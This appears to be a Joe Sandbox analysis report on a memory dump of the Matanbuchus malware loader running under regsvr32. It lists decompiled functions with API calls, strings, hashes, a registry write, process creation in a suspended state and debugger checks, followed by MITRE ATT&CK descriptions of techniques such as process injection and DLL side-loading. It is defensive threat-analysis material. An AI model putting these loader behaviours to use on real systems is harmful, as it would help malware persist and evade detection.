Source File: 0000000B.00000002.2555445907.000000007F4B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F4B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7f4b0000_regsvr32.jbxd

Yara matches

Similarity

API ID: DriveHeapProcessType
String ID: *
API String ID: 2912393814-163128923
Opcode ID: a9f650b680f06d3c34fe578d32644f9d233b111bd98c4cb071fb38abdf45a317
Instruction ID: 8fae923a8819a38a57d5052f410d5bc054d6e72bd527aec5ffbf7a1f110fd0a3
Opcode Fuzzy Hash: a9f650b680f06d3c34fe578d32644f9d233b111bd98c4cb071fb38abdf45a317
Instruction Fuzzy Hash: 4EA13879D14298CFCB14CFAACA407ADBBF2BF49321F28919AD449A7340D7301A5ACF51

Non-executed Functions

Function 7F511417 Relevance: 6.1, APIs: 4, Instructions: 70COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(00000017,00000000), ref: 7F511423
IsDebuggerPresent.KERNEL32 ref: 7F5114EF
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 7F511508
UnhandledExceptionFilter.KERNEL32(?), ref: 7F511512

Memory Dump Source

Source File: 0000000B.00000002.2555445907.000000007F4B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F4B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7f4b0000_regsvr32.jbxd

Yara matches

Similarity

API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
String ID:
API String ID: 254469556-0
Opcode ID: 77bfbc3bcf0d5db804278d0f90cda67a446a40e52d82031158c52db8d7ab7925
Instruction ID: 2f8907a6397089331e4afb9cc5c572a76636319f34135e281492f37c9abc04ae
Opcode Fuzzy Hash: 77bfbc3bcf0d5db804278d0f90cda67a446a40e52d82031158c52db8d7ab7925
Instruction Fuzzy Hash: E4310675C053299BDB10DFA4D989BCDBBB8AF08310F1041EAE40DAB250E7709B84CF45

Function 7F4D6570 Relevance: 25.7, APIs: 4, Strings: 13, Instructions: 244
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

1, xrefs: 7F4D65BB
7, xrefs: 7F4D65C7
>, xrefs: 7F4D65D3
+, xrefs: 7F4D65CB
,, xrefs: 7F4D65D7
i, xrefs: 7F4D65EF
ivh, xrefs: 7F4D661E
;, xrefs: 7F4D65BF
u, xrefs: 7F4D65DB
X, xrefs: 7F4D65B3
*, xrefs: 7F4D65C3
w, xrefs: 7F4D65EB
7, xrefs: 7F4D65CF

Memory Dump Source

Source File: 0000000B.00000002.2555445907.000000007F4B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F4B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7f4b0000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: *$+$,$1$7$7$;$>$X$i$ivh$u$w
API String ID: 0-285284801
Opcode ID: 349d4a61d4d8ef1a5ff31c2c1eea36d5e6ff11bf47de8d047144c4c94960bc5c
Instruction ID: f2af248840053017c6bbd30689c1e382f577c76f8eca488f15286bd070b1059f
Opcode Fuzzy Hash: 349d4a61d4d8ef1a5ff31c2c1eea36d5e6ff11bf47de8d047144c4c94960bc5c
Instruction Fuzzy Hash: ADB12574D04288EFEB01CFA8C994BDEBBB1AF49304F104159EA45BB381D7B56A45CF61

Function 7F4BC650 Relevance: 19.6, APIs: 4, Strings: 7, Instructions: 320COMMON

Download Yara Rule

APIs

__aullrem.LIBCMT ref: 7F4BC89A
__aulldiv.LIBCMT ref: 7F4BC8AE

Strings

d, xrefs: 7F4BC884
d, xrefs: 7F4BC7DB
B:\Loader\Matanbuchus\Main module\Belial project\MatanbuchusLoader\MatanbuchusLoaderFiles\Matanbuchus\json.hpp, xrefs: 7F4BC6D0, 7F4BC863
n_chars < number_buffer.size() - 1, xrefs: 7F4BC868
d, xrefs: 7F4BC71F
false, xrefs: 7F4BC6D5
@, xrefs: 7F4BC84C

Memory Dump Source

Source File: 0000000B.00000002.2555445907.000000007F4B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F4B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7f4b0000_regsvr32.jbxd

Yara matches

Similarity

API ID: __aulldiv__aullrem
String ID: @$B:\Loader\Matanbuchus\Main module\Belial project\MatanbuchusLoader\MatanbuchusLoaderFiles\Matanbuchus\json.hpp$d$d$d$false$n_chars < number_buffer.size() - 1
API String ID: 3839614884-178659603
Opcode ID: 15c12f9a9bdd1b7010920ff5476cedfd0f7421dfda954c7a03862400ab3cd621
Instruction ID: 8479de633950b4559ef81c0acf14e6663d183fb340d7f5c3f89e70001b49ca71
Opcode Fuzzy Hash: 15c12f9a9bdd1b7010920ff5476cedfd0f7421dfda954c7a03862400ab3cd621
Instruction Fuzzy Hash: E1E1B374D01219DFDB24CF98C980B9DBBB2FF88305F2081AAD519A7355D7346A85CF64

Function 7F50EF10 Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 100registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.ADVAPI32(80000001,SOFTWARE,00000000,000F003F,?,00000044,00000000), ref: 7F50EF39
wsprintfW.USER32 ref: 7F50EF86
RegCreateKeyExW.ADVAPI32(?,?,00000000,00000000,00000000,000F003F,00000000,00000000,00000000), ref: 7F50EFA3
RegSetValueExW.ADVAPI32(00000000,bbb,00000000,00000003,00000000,00000000), ref: 7F50EFC4
RegSetValueExW.ADVAPI32(00000000,kkk,00000000,00000003,?,0000000F), ref: 7F50EFE4
RegCloseKey.ADVAPI32(00000000), ref: 7F50EFFD
RegCloseKey.ADVAPI32(00000000), ref: 7F50F008

Part of subcall function 7F50F6E7: GetTickCount.KERNEL32 ref: 7F50F705

Strings

SOFTWARE, xrefs: 7F50EF2C
bbb, xrefs: 7F50EFBC
kkk, xrefs: 7F50EFDC
%s_%x%x, xrefs: 7F50EF80

Memory Dump Source

Source File: 0000000B.00000002.2555445907.000000007F4B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F4B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7f4b0000_regsvr32.jbxd

Yara matches

Similarity

API ID: CloseValue$CountCreateOpenTickwsprintf
String ID: %s_%x%x$SOFTWARE$bbb$kkk
API String ID: 730945307-550109914
Opcode ID: 16059e8c3bddf53996bb278c4a487a8cf61d14ae86e9ed6fedfe33316d147a7e
Instruction ID: 5ae1f224a28bb5cdcd81e58b3d34ba015ec7b81480214dc7b74d2e0195932a82
Opcode Fuzzy Hash: 16059e8c3bddf53996bb278c4a487a8cf61d14ae86e9ed6fedfe33316d147a7e
Instruction Fuzzy Hash: 92310A72A0021CBBDB119EA9DC85EDFBFBDEF05354F100065FA05A6150D630AA94DBA0

Function 7F50F11C Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 246processCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(?), ref: 7F50F149
IsWow64Process.KERNEL32(00000000), ref: 7F50F150
CreateProcessW.KERNEL32(?,00000000,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 7F50F18C
wsprintfW.USER32 ref: 7F50F21A
CloseHandle.KERNEL32(00000000), ref: 7F50F3A5
CloseHandle.KERNEL32(00000000), ref: 7F50F3B0

Strings

?, xrefs: 7F50F1B2
0x%x, xrefs: 7F50F214

Memory Dump Source

Source File: 0000000B.00000002.2555445907.000000007F4B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F4B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7f4b0000_regsvr32.jbxd

Yara matches

Similarity

API ID: Process$CloseHandle$CreateCurrentWow64wsprintf
String ID: 0x%x$?
API String ID: 3386633596-4137330559
Opcode ID: 708c65df61267a7b22c01bb99dc170fdf1aa1c028e92ff53d5ce6720a090bd32
Instruction ID: 641f48de1bd6bd950af8209dc73eb5bcb09604569c588fc46fcdb0edba203e08
Opcode Fuzzy Hash: 708c65df61267a7b22c01bb99dc170fdf1aa1c028e92ff53d5ce6720a090bd32
Instruction Fuzzy Hash: B18139B2D00209AFEF01AEB4CD85EEEB7FDEF48254F140076E916E6150E735AE508A61

Function 7F513BE0 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 132COMMON

Download Yara Rule

APIs

_ValidateLocalCookies.LIBCMT ref: 7F513C17
___except_validate_context_record.LIBVCRUNTIME ref: 7F513C1F
_ValidateLocalCookies.LIBCMT ref: 7F513CA8
__IsNonwritableInCurrentImage.LIBCMT ref: 7F513CD3
_ValidateLocalCookies.LIBCMT ref: 7F513D28
___vcrt_initialize_locks.LIBVCRUNTIME ref: 7F513D3E
___vcrt_uninitialize_locks.LIBVCRUNTIME ref: 7F513D53

Strings

csm, xrefs: 7F513CBD

Memory Dump Source

Source File: 0000000B.00000002.2555445907.000000007F4B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F4B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7f4b0000_regsvr32.jbxd

Yara matches

Similarity

API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record___vcrt_initialize_locks___vcrt_uninitialize_locks
String ID: csm
API String ID: 1385549066-1018135373
Opcode ID: 176673028557a0b6dae448997872c956cad89363755a4ec8ad6bab574d38e0df
Instruction ID: 99e4de2ea0a1125e84f7627b156e1bc6687af16cc9035936343b5644db949456
Opcode Fuzzy Hash: 176673028557a0b6dae448997872c956cad89363755a4ec8ad6bab574d38e0df
Instruction Fuzzy Hash: 0641C83890030AABEF01DF68C890A9EBBB5EF45368F1081B6DC15AF351D735B915DB91

Function 7F50C5A0 Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 206COMMON

Download Yara Rule

APIs

IsCharLowerA.USER32(00000073), ref: 7F50C78A
GetModuleFileNameW.KERNEL32(00000000,kernel32,00000000), ref: 7F50C7AA

Strings

9mD, xrefs: 7F50C7EE
{, xrefs: 7F50C63C
kernel32, xrefs: 7F50C7A3
u, xrefs: 7F50C6D5

Memory Dump Source

Source File: 0000000B.00000002.2555445907.000000007F4B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F4B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7f4b0000_regsvr32.jbxd

Yara matches

Similarity

API ID: CharFileLowerModuleName
String ID: 9mD$kernel32$u${
API String ID: 515556390-2230072418
Opcode ID: 49876baa6ad7360f731cd42ce466d8d56b6999c0f37a64a0d7f05d7850e5e706
Instruction ID: 8700b8bfb742a2d7647cd63098d9a159a4a2c8c66837b1b6346322f17d74082d
Opcode Fuzzy Hash: 49876baa6ad7360f731cd42ce466d8d56b6999c0f37a64a0d7f05d7850e5e706
Instruction Fuzzy Hash: 4DB167B9D04258CFDB50DFAAC9807ADBBB1FF49311F2481AAD458A7391D7341A8ACF50

Function 7F503E80 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 77COMMON

Download Yara Rule

APIs

std::bad_exception::bad_exception.LIBCMTD ref: 7F503EFF
std::bad_exception::bad_exception.LIBCMTD ref: 7F503F19
std::bad_exception::bad_exception.LIBCMTD ref: 7F503F33
std::bad_exception::bad_exception.LIBCMTD ref: 7F503F4D

Strings

B:\Loader\Matanbuchus\Main module\Belial project\MatanbuchusLoader\MatanbuchusLoaderFiles\Matanbuchus\json.hpp, xrefs: 7F503F69
false, xrefs: 7F503F6E

Memory Dump Source

Source File: 0000000B.00000002.2555445907.000000007F4B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F4B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7f4b0000_regsvr32.jbxd

Yara matches

Similarity

API ID: std::bad_exception::bad_exception
String ID: B:\Loader\Matanbuchus\Main module\Belial project\MatanbuchusLoader\MatanbuchusLoaderFiles\Matanbuchus\json.hpp$false
API String ID: 2160870905-4036550669
Opcode ID: aa87c3493d1d6b50463e86c0e631d59857bf7ed507868d4dd134c9dfad45b714
Instruction ID: 5a917a1f78f8491bda682a6c0556b6df9777b3d7ef8527a09ca3da86c158f1ba
Opcode Fuzzy Hash: aa87c3493d1d6b50463e86c0e631d59857bf7ed507868d4dd134c9dfad45b714
Instruction Fuzzy Hash: F8215171A00309EBDB08DFA4C950EEEBBB5EF84300F1886ADE5512B240DB35BA18DB51

Function 7F503D60 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 77COMMON

Download Yara Rule

APIs

std::bad_exception::bad_exception.LIBCMTD ref: 7F503DDF
std::bad_exception::bad_exception.LIBCMTD ref: 7F503DF9
std::bad_exception::bad_exception.LIBCMTD ref: 7F503E13
std::bad_exception::bad_exception.LIBCMTD ref: 7F503E2D

Strings

B:\Loader\Matanbuchus\Main module\Belial project\MatanbuchusLoader\MatanbuchusLoaderFiles\Matanbuchus\json.hpp, xrefs: 7F503E49
false, xrefs: 7F503E4E

Memory Dump Source

Source File: 0000000B.00000002.2555445907.000000007F4B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F4B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7f4b0000_regsvr32.jbxd

Yara matches

Similarity

API ID: std::bad_exception::bad_exception
String ID: B:\Loader\Matanbuchus\Main module\Belial project\MatanbuchusLoader\MatanbuchusLoaderFiles\Matanbuchus\json.hpp$false
API String ID: 2160870905-4036550669
Opcode ID: 9305a6b6a48e856b9557fd8bea424aacb92c2d02a47266f3d9ab328b45546c4a
Instruction ID: 72ac1bd6ecff8dd054474969fead1a8c36212f33bb22b17da3028a12999c921d
Opcode Fuzzy Hash: 9305a6b6a48e856b9557fd8bea424aacb92c2d02a47266f3d9ab328b45546c4a
Instruction Fuzzy Hash: 97213271A00309EBDB04DFA4C950EEEB7B5FF84300F188AADE5556B240DB31BA19DB51

Function 7F51F245 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 64COMMONLIBRARYCODE

Download Yara Rule

APIs

GetStdHandle.KERNEL32(000000F4,?,00003C16), ref: 7F51F265
GetFileType.KERNEL32(00000000,?,00003C16), ref: 7F51F277
swprintf.LIBCMT ref: 7F51F298
WriteConsoleW.KERNEL32(00000000,?,?,?,00000000,?,?,?,?,00003C16), ref: 7F51F2D5

Strings

Assertion failed: %Ts, file %Ts, line %d, xrefs: 7F51F28D

Memory Dump Source

Source File: 0000000B.00000002.2555445907.000000007F4B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F4B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7f4b0000_regsvr32.jbxd

Yara matches

Similarity

API ID: ConsoleFileHandleTypeWriteswprintf
String ID: Assertion failed: %Ts, file %Ts, line %d
API String ID: 2943507729-1719349581
Opcode ID: 196688fc563dfda52e383414dfbe408c61344d92b6654df12c95049f997cd3f0
Instruction ID: c14df4ac0202c97a190e73a0a0c48076926699504070ce5b40fec9e819751c1f
Opcode Fuzzy Hash: 196688fc563dfda52e383414dfbe408c61344d92b6654df12c95049f997cd3f0
Instruction Fuzzy Hash: 5311087A9002196BDB109F29CD44EDE77FCDF85324F504569EA36D7141EA30BD42CB64

Function 7F5207EA Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 42libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,497C06E6,7F5352A0,?,00000000,7F533C13,000000FF,?,7F52077A,7D83FC4D,?,7F52074E,7F5352A0), ref: 7F52081F
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 7F520831
FreeLibrary.KERNEL32(00000000,?,00000000,7F533C13,000000FF,?,7F52077A,7D83FC4D,?,7F52074E,7F5352A0), ref: 7F520853

Strings

mscoree.dll, xrefs: 7F520818
CorExitProcess, xrefs: 7F520829

Memory Dump Source

Source File: 0000000B.00000002.2555445907.000000007F4B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F4B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7f4b0000_regsvr32.jbxd

Yara matches

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: 00c417d4fbdf55939111e6c2edcf27af1796b48b8ab9a15c093b524a319b5a53
Instruction ID: 21d44ff42f62dc76e2dbf9aaa7d4394ab3247b7f689c3c87a9ea82f3b3aaaea9
Opcode Fuzzy Hash: 00c417d4fbdf55939111e6c2edcf27af1796b48b8ab9a15c093b524a319b5a53
Instruction Fuzzy Hash: B9018F76D18619AFDB028F55CD09BAEBBF8FF05729F010235EC12A6280DB749900DA90

Function 7F4C57E0 Relevance: 7.6, APIs: 5, Instructions: 91COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 7F4C5807
int.LIBCPMTD ref: 7F4C5820

Part of subcall function 7F4CAA20: std::_Lockit::_Lockit.LIBCPMT ref: 7F4CAA36
Part of subcall function 7F4CAA20: std::_Lockit::~_Lockit.LIBCPMT ref: 7F4CAA60

Concurrency::cancel_current_task.LIBCPMTD ref: 7F4C5867
std::_Lockit::~_Lockit.LIBCPMT ref: 7F4C58FB

Memory Dump Source

Source File: 0000000B.00000002.2555445907.000000007F4B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F4B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7f4b0000_regsvr32.jbxd

Yara matches

Similarity

API ID: Lockitstd::_$Lockit::_Lockit::~_$Concurrency::cancel_current_task
String ID:
API String ID: 3053331623-0
Opcode ID: 8a7eb2eab246165e1e291e9c5671ef0e6b423137fcf929828aa0517ceebfbb11
Instruction ID: 49d7af6aba27690ac775a59ea9fbd24ab8d4849b9a259e0464a5895f5c88f25e
Opcode Fuzzy Hash: 8a7eb2eab246165e1e291e9c5671ef0e6b423137fcf929828aa0517ceebfbb11
Instruction Fuzzy Hash: 4141C9B8D00609DFCB04CF98D980AEEFBB1FF48310F204269E515A7390D7346A41CBA1

Function 7F4C56A0 Relevance: 7.6, APIs: 5, Instructions: 91COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 7F4C56C7
int.LIBCPMTD ref: 7F4C56E0

Part of subcall function 7F4CAA20: std::_Lockit::_Lockit.LIBCPMT ref: 7F4CAA36
Part of subcall function 7F4CAA20: std::_Lockit::~_Lockit.LIBCPMT ref: 7F4CAA60

Concurrency::cancel_current_task.LIBCPMTD ref: 7F4C5727
std::_Lockit::~_Lockit.LIBCPMT ref: 7F4C57BB

Memory Dump Source

Source File: 0000000B.00000002.2555445907.000000007F4B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F4B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7f4b0000_regsvr32.jbxd

Yara matches

Similarity

API ID: Lockitstd::_$Lockit::_Lockit::~_$Concurrency::cancel_current_task
String ID:
API String ID: 3053331623-0
Opcode ID: ec1807d5195a8d0076c52f8993be0ed0d89fded79285382b5b863153a89adb2a
Instruction ID: 6a37f800931e25364995628059515ddf9ffee387dbb4add5baf9e6c1f3f97a9c
Opcode Fuzzy Hash: ec1807d5195a8d0076c52f8993be0ed0d89fded79285382b5b863153a89adb2a
Instruction Fuzzy Hash: F341B7B8D01609DFCB04CF95D990AEEBBB1FF48310F204269E815A7390D7346A41CBA1

Function 7F4C5920 Relevance: 7.6, APIs: 5, Instructions: 91COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 7F4C5947
int.LIBCPMTD ref: 7F4C5960

Part of subcall function 7F4CAA20: std::_Lockit::_Lockit.LIBCPMT ref: 7F4CAA36
Part of subcall function 7F4CAA20: std::_Lockit::~_Lockit.LIBCPMT ref: 7F4CAA60

Concurrency::cancel_current_task.LIBCPMTD ref: 7F4C59A7
std::_Lockit::~_Lockit.LIBCPMT ref: 7F4C5A3B

Memory Dump Source

Source File: 0000000B.00000002.2555445907.000000007F4B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F4B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7f4b0000_regsvr32.jbxd

Yara matches

Similarity

API ID: Lockitstd::_$Lockit::_Lockit::~_$Concurrency::cancel_current_task
String ID:
API String ID: 3053331623-0
Opcode ID: 8c3c904a3a58cfdbe510c7c7508fe930a63ae18b6bfee5eaacaaf254e7c9bc45
Instruction ID: da8ec0b6be8db4018aa78d9d2cd83fcf8a6a5c4c42701a36490cc7bb98a3ccf2
Opcode Fuzzy Hash: 8c3c904a3a58cfdbe510c7c7508fe930a63ae18b6bfee5eaacaaf254e7c9bc45
Instruction Fuzzy Hash: 4441C9B8D00609DFCB04CF98D980AEEFBB1FF48310F208269E515A7390D7346A45CBA1

Function 7F50FDA4 Relevance: 7.5, APIs: 5, Instructions: 44COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 7F50FDAB
std::_Lockit::_Lockit.LIBCPMT ref: 7F50FDB6
std::_Lockit::~_Lockit.LIBCPMT ref: 7F50FE24

Part of subcall function 7F50FF07: std::locale::_Locimp::_Locimp.LIBCPMT ref: 7F50FF1F

std::locale::_Setgloballocale.LIBCPMT ref: 7F50FDD1
_Yarn.LIBCPMT ref: 7F50FDE7

Memory Dump Source

Source File: 0000000B.00000002.2555445907.000000007F4B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F4B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7f4b0000_regsvr32.jbxd

Yara matches

Similarity

API ID: Lockitstd::_std::locale::_$H_prolog3LocimpLocimp::_Lockit::_Lockit::~_SetgloballocaleYarn
String ID:
API String ID: 1088826258-0
Opcode ID: e4f18bc459b22496237305158f0f7170f860b5e035f26f7bbae1187a51132e4c
Instruction ID: 2408a71929254e8dfe66cb59b854dbfc32cfa0cf84e0c6dec47747ca7d42a7de
Opcode Fuzzy Hash: e4f18bc459b22496237305158f0f7170f860b5e035f26f7bbae1187a51132e4c
Instruction Fuzzy Hash: BA017C7AA00211ABD706EF34D49067DBBB5FFC5224B28416AD8225B380DF746A42CBD1

Function 7F514F92 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 27libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(00000011,00000000,00000800,?,7F514F43,00000000,00000001,7F8155E4,?,?,?,7F5150E6,00000004,InitializeCriticalSectionEx,7F53AE34,InitializeCriticalSectionEx), ref: 7F514F9F
GetLastError.KERNEL32(?,7F514F43,00000000,00000001,7F8155E4,?,?,?,7F5150E6,00000004,InitializeCriticalSectionEx,7F53AE34,InitializeCriticalSectionEx,00000000,?,7F514E9D), ref: 7F514FA9
LoadLibraryExW.KERNEL32(00000011,00000000,00000000,?,00000011,7F513D43), ref: 7F514FD1

Strings

api-ms-, xrefs: 7F514FB6

Memory Dump Source

Source File: 0000000B.00000002.2555445907.000000007F4B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F4B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7f4b0000_regsvr32.jbxd

Yara matches

Similarity

API ID: LibraryLoad$ErrorLast
String ID: api-ms-
API String ID: 3177248105-2084034818
Opcode ID: 19a9c60d416c207a448820aab90a10ae12cabecb9b7b7ef62e7e5ca6dbf91bac
Instruction ID: 0ee3222c9e962241b0da35c061763b65669387642eefefdf90f5077503430b6b
Opcode Fuzzy Hash: 19a9c60d416c207a448820aab90a10ae12cabecb9b7b7ef62e7e5ca6dbf91bac
Instruction Fuzzy Hash: 78E0D839648309B7EB010EA1DC05F093F65AF12765F244030F90EE86D0E761F431D9C0

Function 7F50F930 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(ntdll.dll,RtlRandomEx,?,7F50F717,?,?,?,7F50EF6C,?,0000000F,?,00000000,00000208), ref: 7F50F946
GetProcAddress.KERNEL32(00000000), ref: 7F50F94D

Strings

RtlRandomEx, xrefs: 7F50F93C
ntdll.dll, xrefs: 7F50F941

Memory Dump Source

Source File: 0000000B.00000002.2555445907.000000007F4B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F4B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7f4b0000_regsvr32.jbxd

Yara matches

Similarity

API ID: AddressHandleModuleProc
String ID: RtlRandomEx$ntdll.dll
API String ID: 1646373207-4284430886
Opcode ID: e0426b4f004c61c1bb5f60d94a755fc3607f73315040262522898b7983753f60
Instruction ID: 1f5e0e06ba9e389ce0f37af55e45576e0a9b7e4a2e0474ad3e632c81432c5f24
Opcode Fuzzy Hash: e0426b4f004c61c1bb5f60d94a755fc3607f73315040262522898b7983753f60
Instruction Fuzzy Hash: 6BD0C77A918304ABDF006FFEDD88A153FA9EF055393540624FD0DCA200D7349668DF50

Function 7F4E55B0 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 209COMMON

Download Yara Rule

APIs

std::exception::exception.LIBCONCRTD ref: 7F4E5868

Strings

parse_error, xrefs: 7F4E55D5
parse error, xrefs: 7F4E5633, 7F4E566E

Memory Dump Source

Source File: 0000000B.00000002.2555445907.000000007F4B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F4B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7f4b0000_regsvr32.jbxd

Yara matches

Similarity

API ID: std::exception::exception
String ID: parse error$parse_error
API String ID: 2807920213-1820534363
Opcode ID: 479070de7512b5066128018dce005cb7f9fddfe82cc55df0f2b77b4b12dbeb71
Instruction ID: 1256113140b728467dc7c664eb276e6b6e3e9cfda8410e9b3d7dc0b35bc3604a
Opcode Fuzzy Hash: 479070de7512b5066128018dce005cb7f9fddfe82cc55df0f2b77b4b12dbeb71
Instruction Fuzzy Hash: C3A102B4D04258DFDB14CFA8D990AEEBBB1BF49304F2081ADD959AB351DB306A45CF90

Function 7F4C7AD0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 81COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 7F4C7AF3
std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 7F4C7BBF

Part of subcall function 7F50FEA2: _Yarn.LIBCPMT ref: 7F50FEC1
Part of subcall function 7F50FEA2: _Yarn.LIBCPMT ref: 7F50FEE5

Strings

bad locale name, xrefs: 7F4C7BC9

Memory Dump Source

Source File: 0000000B.00000002.2555445907.000000007F4B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F4B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7f4b0000_regsvr32.jbxd

Yara matches

Similarity

API ID: Yarnstd::_$Locinfo::_Locinfo_ctorLockitLockit::_
String ID: bad locale name
API String ID: 1908188788-1405518554
Opcode ID: 5818393678844864a23c0cb20eca4909cf17dd53bb3f5e9a7d713b19f5ba5657
Instruction ID: 12995ad06cf0a277cc5826526f14c12769227996d25b514b045253778552f62b
Opcode Fuzzy Hash: 5818393678844864a23c0cb20eca4909cf17dd53bb3f5e9a7d713b19f5ba5657
Instruction Fuzzy Hash: 8741F5B4D05289DFDB01CFA8C994BAEFBF1BF49304F148199D415AB381C77A9901CBA5

Description:	Adversaries may move onto systems, possibly those on disconnected or air-gapped networks, by copying malware to removable media and taking advantage of Autorun features when the media is inserted into a system and executes. In the case of Lateral Movement, this may occur through modification of executable files stored on removable media or by copying malware and renaming it to look like a legitimate file to trick users into executing it on a separate system. In the case of Initial Access, this may occur through manual manipulation of the media, modification of systems used to initially format the media, or modification to the media's firmware itself.
Tactics:	Initial Access, Lateral Movement
Data Sources:	Drive: Drive Creation, File: File Access, File: File Creation, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
